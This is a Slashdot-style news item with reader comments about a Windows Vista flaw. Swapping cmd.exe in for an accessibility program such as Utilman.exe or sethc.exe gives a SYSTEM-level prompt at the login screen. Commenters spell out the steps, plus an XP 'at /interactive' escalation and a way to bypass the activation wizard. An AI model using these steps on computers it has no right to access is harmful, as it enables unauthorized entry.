Gaining System-Level Access To Vista

An anonymous reader writes "This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator. The person who discovered this security hole claims that XP, 2000, 2003 and NT are not vulnerable to it; only Windows Vista is."

Re:physical access == game over

[hcmtnbiker]

It wont bypass bitlocker if you have to put in a password as soon as you boot, but it might if you have it set up the other way.

Physical access does always mean game over, bruting(most people keep thier FDE passwords around 4 characters) and the possibility of plain text attacks exist on certain blocks.

The interesting thing is that the utility for helping impaired people is run as SYSTEM when it really doesn't have to be. I had wondered this and thought about doing the same hack before ever even seeing this video, however didn't ever bother to do it, the possibility of messing something up and having to revert it after just seemed too annoying to me.

DUH..... this works in 2000 and xp as well

[sandmtyh]

boot NTFS live linux CD rename magnify.exe magnify.bak. copy cmd.exe to magnify.exe. boot to login screen and press windowskey+U and choose magnify the screen. system level access to anything. Also if you are an admin in windows xp, just run "at 12:05 /interactive cmd.exe" at 12:05 there will be a cmd promt that pops open (BTW you can use any time, then adjust the system clock) the cmd prompt that pops open will have system level access. use taskmgr to kill explorer.exe then lauch explorer from the cmd prompt..... you are now system. I have been using this for years... i was told that MS was going to sign all the EXE files to stop this attack, but guess what..... cmd.exe will still be signed. people who are surprised by this.... you might also like to know how to get remote desktop running on XP home http://www.geekport.com/2007/08/15/enabling-remote-desktop-in-xp-home/

Re:physical access == game over

[sandmtyh]

it works in xp and 2000... you just have to do the same trick with diffrent file names.

Re:physical access == game over

[Hunter-Killer]

Parent is correct; been doing this in XP for years with C:\windows\system32\sethc.exe (StickyKeys).

The article wouldn't have been newsworthy if it had merely said "Vista just as vulnerable, nothing new." Especially since the old tricks are often the first things tried with the new OS.

Re:physical access == game over

[Barny]

You can also use similar tricks to work around the vista Activation wizard to install drivers.

When vista says "activate now or die" tap shift 5 times, opt to go to accessibility panel, now you have an explorer window running as System, you can jump to control panel, start up all the networking and windows installer services, install those pesky Lan drivers, then exit back and activate windows.

This works so well now because of the heavy integration of explorer/iexplore and the configuration panel scripts.

Re:physical access == game over

[karmatic]

Or, you could just pay for that software you've pirated. See, no more pesky activation dialogs. But of course being Slashdot, that means that it's noble to somehow stick it to Microsoft. Did you actually read the parent? It's possible to get Vista into a state where you can't activate (online) because you lack networking drivers.

Instead of using the incredibly painful phone activation, you can use this to install said LAN drivers and activate.

If you're using a pirate copy, there's no pesky activation dialog either, and if you're using a crack, you don't really need LAN drivers to use it, do you?